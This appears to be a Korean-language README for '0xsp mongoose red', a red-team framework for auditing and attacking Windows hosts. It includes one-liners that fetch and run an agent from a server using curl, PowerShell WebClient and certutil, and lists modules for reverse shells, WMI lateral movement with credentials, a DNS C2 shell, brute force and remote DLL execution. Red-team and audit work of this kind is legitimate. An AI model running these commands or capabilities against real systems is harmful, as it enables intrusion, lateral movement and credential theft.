
사이버 보안 시뮬레이션 및 레드 팀 운영을 위한 독특한 프레임워크로, 최신 취약점, 잘못된 구성 및 권한 상승 공격에 대한 Windows 감사를 수행하며, 네트워크 내 고급 공격자의 전술과 기술을 모방합니다.
지속적인 개발을 위해 프로젝트를 지원하세요 (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)
현재 릴리스 2.2.0
0xsp mongoose red 버전은 사이버 보안 시뮬레이션 중 여러분의 요구를 지원하기 위해 제공됩니다. 이 버전을 사용하면 대상 Windows 운영 체제를 감사하여 시스템 취약점, 잘못된 구성 및 권한 상승 공격을 찾아내고 네트워크에서 고급 공격자의 전술과 기술을 복제할 수 있습니다.
Node.js 지원을 통한 웹 애플리케이션 API로 설치 및 사용자 정의를 적시에 훨씬 쉽게 수행할 수 있습니다. Windows 센서 에이전트는 애플리케이션 API와 통신하여 결과를 전송하고 양방향 기술로 명령을 수신합니다.
에이전트는 windows update api 및 exploit database definitions 모듈을 사용하여 Windows 익스플로잇을 식별하고 탐지할 수 있습니다. 새 릴리스는 다음 취약점도 탐지합니다.
git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose
cd 0xsp-mongoose/
npm install
node index.js
기본 액세스 자격 증명 :
touch temp.txt
python3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP
#예제 1
curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
#예제 2
powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
#예제 3
certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe
-s --Windows 서비스 및 설치된 드라이버 검색.
-u --사용자, 그룹, 역할 정보 검색.
-c --연결된 드라이버에서 확장자별 민감한 구성 파일 검색.
-n --네트워크 정보, 네트워크 인터페이스, 연결 세부 정보 검색.
-w --쓰기 가능한 디렉터리, 액세스 권한 확인, 변경된 권한 열거.
-i --Windows 시스템 정보, 세션, 항상 상승된 권한 확인 열거.
-l --특정 문자열을 모든 파일에서 검색, 예: agent.exe -l c:\ password *.config.
-o --Node.js 애플리케이션의 호스트 주소 지정, srvhost도 사용 가능
-p --설치된 소프트웨어, 실행 중인 프로세스, 작업 열거.
-e --커널 검사 도구, 도구 데이터베이스에서 Windows 커널 취약점 검색 지원
-x --Node.js 애플리케이션 연결 인증 비밀번호.
-d --대상 머신에 직접 파일 다운로드.
-t --대상 머신에서 Node.js 애플리케이션으로 파일 업로드.
-spooler --단일 호스트 또는 호스트 목록에서 CVE-2021-1675 가능성 스캔 (예: -spooler -srvhost 또는 -spooler -hosts)
-m --알려진 모든 스캔 유형 함께 실행.
[!] 레드 팀 전술 섹션
-r --특정 계정으로 리버스 셸 생성.
-lr --WMI를 사용한 측면 이동 기술 (예: -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip)
-nds --네트워크 검색 및 공유 열거
-dns --인터랙티브 DNS C2C 셸 구축
-cmd --HTTP 셸을 통해 명령 전송
-interactive --인터랙티브 모드 시작 (예: 플러그인 로딩 등)
-username --특정 공격 모듈의 신원 인증.
-password --특정 공격 모듈의 신원 인증.
-host --공격할 원격 호스트 지정.
-srvhost --Node.js 애플리케이션의 rhost 설정.
-bf --로컬 사용자/도메인 사용자 무차별 대입 모듈
-import --DLL 파일을 로컬로 가져와 실행
-remote --원격 호스트에서 DLL 파일을 가져와 실행
https://0xsp.com/security%20dev/0xsp-mongoose-red
0xsp에 대한 새로운 튜토리얼과 트릭이 게시될 때 알림을 받으려면 다음 채널을 구독하세요. https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg